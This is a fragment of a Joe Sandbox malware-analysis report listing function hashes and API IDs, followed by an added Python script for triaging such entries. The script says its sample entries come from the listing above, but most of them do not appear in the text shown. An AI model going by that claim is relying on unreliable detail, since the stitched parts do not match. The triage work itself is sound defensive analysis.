                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: DecodePointer_errno_invalid_parameter_noinfo_lock
                                                • String ID:
                                                • API String ID: 27599310-0
                                                • Opcode ID: 531920fce68136e9c35c3a2682e57cc816ebcda5ab9a9cb6cfa04ab9307bab91
                                                • Instruction ID: 45e52dc0f8c428bfa106a654589a44f8e36e0e0fb3af29b3be7eaefd930fce95
                                                • Opcode Fuzzy Hash: 531920fce68136e9c35c3a2682e57cc816ebcda5ab9a9cb6cfa04ab9307bab91
                                                • Instruction Fuzzy Hash: BA515C32F0C64286EA79AB15EC4423EB292EB84764FD4443FD9CE46794DE3CE445CA23
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$StringTypemalloc
                                                • String ID:
                                                • API String ID: 4066956681-0
                                                • Opcode ID: e5cffde83cb833e0932887e32bd2dd3c7c25309736ff150266516a81da26abab
                                                • Instruction ID: db92acd2d3356dcf618f85b49d0f1c8b633a1cdec9d44207b16381188d28882e
                                                • Opcode Fuzzy Hash: e5cffde83cb833e0932887e32bd2dd3c7c25309736ff150266516a81da26abab
                                                • Instruction Fuzzy Hash: 8141A462A04B8186EB60BF25DC00169A395FF45BB4FD8423BEE6D477D4DE3DE4058B21
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: _amsg_exit_getptd$_lock
                                                • String ID:
                                                • API String ID: 3670291111-0
                                                • Opcode ID: 40fa8a02b52b9aa11293c6beee845f869b20b37b19334275766aa323fb9eacb8
                                                • Instruction ID: fa2430df5ef43d80fa580065d8573c526433491a51f84a8599d7e9b23be244b4
                                                • Opcode Fuzzy Hash: 40fa8a02b52b9aa11293c6beee845f869b20b37b19334275766aa323fb9eacb8
                                                • Instruction Fuzzy Hash: F2F0F921A1A14686FBA4BB65DC417B8A2A2EF44740FC8113EDA8D073D2DE1CA8448B37
                                                Uniqueness

                                                Uniqueness Score: -1.00%
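The function entries above follow one fixed layout (APIs, Memory Dump Source, Similarity with API ID / String ID / Opcode ID, Uniqueness Score), and most of the ones in this stretch of the listing are MSVC CRT startup and exit helpers rather than the sample's own logic. The script below is an added example, not part of the Joe Sandbox report: it parses that layout into records and labels each one, so the analyst can skip CRT boilerplate and spend time on entries such as the two that resolve LocalAlloc from kernel32 at run time. The CRT labels and the token heuristics are my own assumptions; the sample text is four entries copied from the listing above and trimmed to the fields the parser reads.

```python
"""Parse the per-function blocks of a Joe Sandbox report (APIs / Similarity /
Opcode ID / Uniqueness) and separate MSVC CRT boilerplate from code worth
reversing. Added example; the CRT labels are heuristics, not report data."""
import re
from dataclasses import dataclass, field

# Constructed sample: four entries copied from the p2pWin.exe listing above,
# trimmed to the fields this parser reads.
SAMPLE = """\
APIs
• DecodePointer.KERNEL32(?,?,?,00007FF72E9087A5), ref: 00007FF72E9086B9
  • Part of subcall function 00007FF72E90918C: _errno.LIBCMT ref: 00007FF72E909195
• EncodePointer.KERNEL32(?,?,?,00007FF72E9087A5), ref: 00007FF72E908747
Memory Dump Source
• Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
Similarity
• API ID: Pointer$Encode$Decode$Sleep_errno_invalid_parameter_noinforealloc
• String ID:
• Opcode ID: c52e1b09a50c06291591c65438d86ecc49300948b8df8488fe33684004ad8daa
Uniqueness Score: -1.00%
APIs
Similarity
• API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
• String ID:
• Opcode ID: f9202979a7542460e9361c27ea97c69b921579607e91b3df6b9d0368e6733a29
Uniqueness Score: -1.00%
APIs
Strings
Similarity
• API ID: AddressHandleModuleProc$FilePointer
• String ID: LocalAlloc$kernel32
• Opcode ID: c5291f9e83ebfd14ac5185bb3fe49c08fc751065ba87d2c77bd2fa49d6794c12
Uniqueness Score: -1.00%
APIs
• GetModuleHandleW.KERNEL32(?,?,000000FF,00007FF72E9058D5), ref: 00007FF72E90589B
• GetProcAddress.KERNEL32(?,?,000000FF,00007FF72E9058D5), ref: 00007FF72E9058B0
Strings
Similarity
• API ID: AddressHandleModuleProc
• String ID: CorExitProcess$mscoree.dll
• Opcode ID: f78ffa323bab2fd1d92cb2e075742adc844aeb1b3a717ca98cca0424df0a5935
Uniqueness Score: -1.00%
"""

@dataclass
class FuncEntry:
    api_id: str = ""
    string_id: str = ""
    opcode_id: str = ""        # stable hash to pivot on across samples
    uniqueness: str = ""
    apis: list = field(default_factory=list)   # (name, module, ref address)

_FIELDS = {"API ID": "api_id", "String ID": "string_id",
           "Opcode ID": "opcode_id", "Uniqueness Score": "uniqueness"}
_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Similarity",
            "Uniqueness", "Joe Sandbox IDA Plugin"}
# "Name.MODULE(...), ref: ADDR" or "Part of subcall function X: Name.MODULE ref: ADDR"
_API_RE = re.compile(r"^(?:Part of subcall function [0-9A-F]+: )?(\w+)\.([A-Z0-9]+)\b"
                     r".*?(?:ref: ([0-9A-F]+))?$")

def parse_entries(text: str) -> list:
    """Split the listing into FuncEntry records; 'Uniqueness Score' ends one."""
    entries, cur, section = [], FuncEntry(), None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line in _HEADERS:
            section = line
            continue
        key, _, val = line.partition(":")
        if key in _FIELDS:
            setattr(cur, _FIELDS[key], val.strip())
            if key == "Uniqueness Score":
                entries.append(cur)
                cur = FuncEntry()
        elif section == "APIs":
            m = _API_RE.match(line)
            if m:
                cur.apis.append((m.group(1), m.group(2), m.group(3) or ""))
    return entries

# Assumed labels for API-ID|String-ID pairs left by the MSVC CRT's own
# startup and exit helpers in x64 builds (heuristic, not from the report).
CRT_KNOWN = {
    "CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick|":
        "__security_init_cookie (seeds the /GS cookie)",
    "AddressHandleModuleProc|CorExitProcess$mscoree.dll":
        "__crtCorExitProcess (CRT exit path via the CLR)",
}
# Tokens that only CRT-internal helpers contribute to an API ID.
CRT_TOKENS = ("_errno", "_getptd", "_lock", "_amsg_exit", "_invalid_parameter")

def classify(e: FuncEntry) -> tuple:
    """Return ('crt', why) for CRT boilerplate, else ('review', why)."""
    key = f"{e.api_id}|{e.string_id}"
    if key in CRT_KNOWN:
        return "crt", CRT_KNOWN[key]
    if any(mod == "LIBCMT" for _, mod, _ in e.apis) or any(t in e.api_id for t in CRT_TOKENS):
        return "crt", "calls CRT-internal helpers"
    why = "no CRT signature"
    if "AddressHandleModuleProc" in e.api_id:   # GetModuleHandle + GetProcAddress
        why += f"; resolves imports at run time ({e.string_id or '?'})"
    return "review", why

def triage(text: str) -> list:
    """Parse a listing and attach a label to every entry."""
    rows = []
    for e in parse_entries(text):
        label, why = classify(e)
        rows.append({"label": label, "why": why, "api_id": e.api_id,
                     "opcode_id": e.opcode_id, "apis": [f"{n}.{m}" for n, m, _ in e.apis]})
    return rows

if __name__ == "__main__":
    for r in triage(SAMPLE):
        print(f"{r['label']:6} {r['opcode_id'][:16]}  {r['api_id'][:44]:44}  {r['why']}")
```

Feed it the report's function section as text (it ignores the Memory Dump Source and Joe Sandbox IDA Plugin lines), then work the `review` rows first; the Opcode ID of a `review` row is the value to search for in other reports from the same family, since the CRT rows will match any MSVC x64 binary.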